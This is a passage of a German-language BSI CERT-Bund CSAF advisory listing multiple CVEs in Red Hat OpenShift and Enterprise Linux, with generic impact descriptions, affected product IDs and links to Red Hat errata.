Action not permitted
Modal body text goes here.
Modal Title
Modal Body
wid-sec-w-2024-1226
Vulnerability from csaf_certbund
Published
2024-05-22 22:00
Modified
2024-06-13 22:00
Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand zu verursachen, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, seine Privilegien zu erweitern oder um weitere nicht spezifizierte Angriffe auszuführen.
Betroffene Betriebssysteme
- Linux
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand zu verursachen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, seine Privilegien zu erweitern oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren.", "title": "Angriff" }, { "category": "general", "text": "- Linux", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2024-1226 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1226.json" }, { "category": "self", "summary": "WID-SEC-2024-1226 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1226" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:2874 vom 2024-05-22", "url": "https://access.redhat.com/errata/RHSA-2024:2874" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:2929 vom 2024-05-22", "url": "https://access.redhat.com/errata/RHSA-2024:2929" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:2930 vom 2024-05-22", "url": "https://access.redhat.com/errata/RHSA-2024:2930" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:2932 vom 2024-05-22", "url": "https://access.redhat.com/errata/RHSA-2024:2932" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:2933 vom 2024-05-22", "url": "https://access.redhat.com/errata/RHSA-2024:2933" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:2874 vom 2024-05-22", "url": "https://access.redhat.com/errata/RHSA-2024:3316" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:2901 vom 2024-05-23", "url": "https://access.redhat.com/errata/RHSA-2024:2901" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:3473 vom 2024-05-29", "url": "https://access.redhat.com/errata/RHSA-2024:3473" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:3790 vom 2024-06-11", "url": "https://access.redhat.com/errata/RHSA-2024:3790" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:3715 vom 2024-06-12", "url": "https://access.redhat.com/errata/RHSA-2024:3715" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2024:3314 vom 2024-06-13", "url": "https://access.redhat.com/errata/RHSA-2024:3314" }, { "category": "external", "summary": "RedHat Security Advisory", "url": "https://access.redhat.com/errata/RHSA-2024:3919" } ], "source_lang": "en-US", "title": "Red Hat OpenShift: Mehrere Schwachstellen", "tracking": { "current_release_date": "2024-06-13T22:00:00.000+00:00", "generator": { "date": "2024-06-14T08:08:23.564+00:00", "engine": { "name": "BSI-WID", "version": "1.3.0" } }, "id": "WID-SEC-W-2024-1226", "initial_release_date": "2024-05-22T22:00:00.000+00:00", "revision_history": [ { "date": "2024-05-22T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2024-05-23T22:00:00.000+00:00", "number": "2", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2024-05-30T22:00:00.000+00:00", "number": "3", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2024-06-10T22:00:00.000+00:00", "number": "4", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2024-06-11T22:00:00.000+00:00", "number": "5", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2024-06-13T22:00:00.000+00:00", "number": "6", "summary": "Neue Updates von Red Hat aufgenommen" } ], "status": "final", "version": "6" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux", "product": { "name": "Red Hat Enterprise Linux", "product_id": "67646", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:-" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux", "product": { "name": "Red Hat Enterprise Linux", "product_id": "T035142", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:-" } } } ], "category": "product_name", "name": "Enterprise Linux" }, { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift", "product": { "name": "Red Hat OpenShift", "product_id": "T035034", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:-" } } }, { "category": "product_version_range", "name": "Migration Toolkit for Applications \u003c7.0.3", "product": { "name": "Red Hat OpenShift Migration Toolkit for Applications \u003c7.0.3", "product_id": "T035036", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:migration_toolkit_for_applications__7.0.3" } } }, { "category": "product_version", "name": "Custom Metric Autoscaler 2", "product": { "name": "Red Hat OpenShift Custom Metric Autoscaler 2", "product_id": "T035047", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:custom_metric_autoscaler_2" } } } ], "category": "product_name", "name": "OpenShift" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-26555", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2020-26555" }, { "cve": "CVE-2021-25220", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2021-25220" }, { "cve": "CVE-2021-29390", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2021-29390" }, { "cve": "CVE-2021-43618", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2021-43618" }, { "cve": "CVE-2022-0480", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2022-0480" }, { "cve": "CVE-2022-2795", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2022-2795" }, { "cve": "CVE-2022-3094", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2022-3094" }, { "cve": "CVE-2022-38096", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2022-38096" }, { "cve": "CVE-2022-40090", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2022-40090" }, { "cve": "CVE-2022-45934", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2022-45934" }, { "cve": "CVE-2022-48554", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2022-48554" }, { "cve": "CVE-2022-48624", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2022-48624" }, { "cve": "CVE-2023-24023", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-24023" }, { "cve": "CVE-2023-25193", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-25193" }, { "cve": "CVE-2023-25775", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-25775" }, { "cve": "CVE-2023-26159", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-26159" }, { "cve": "CVE-2023-26364", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-26364" }, { "cve": "CVE-2023-28322", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-28322" }, { "cve": "CVE-2023-28464", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-28464" }, { "cve": "CVE-2023-28866", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-28866" }, { "cve": "CVE-2023-2975", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-2975" }, { "cve": "CVE-2023-31083", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-31083" }, { "cve": "CVE-2023-31122", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-31122" }, { "cve": "CVE-2023-3446", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-3446" }, { "cve": "CVE-2023-3567", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-3567" }, { "cve": "CVE-2023-3618", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": 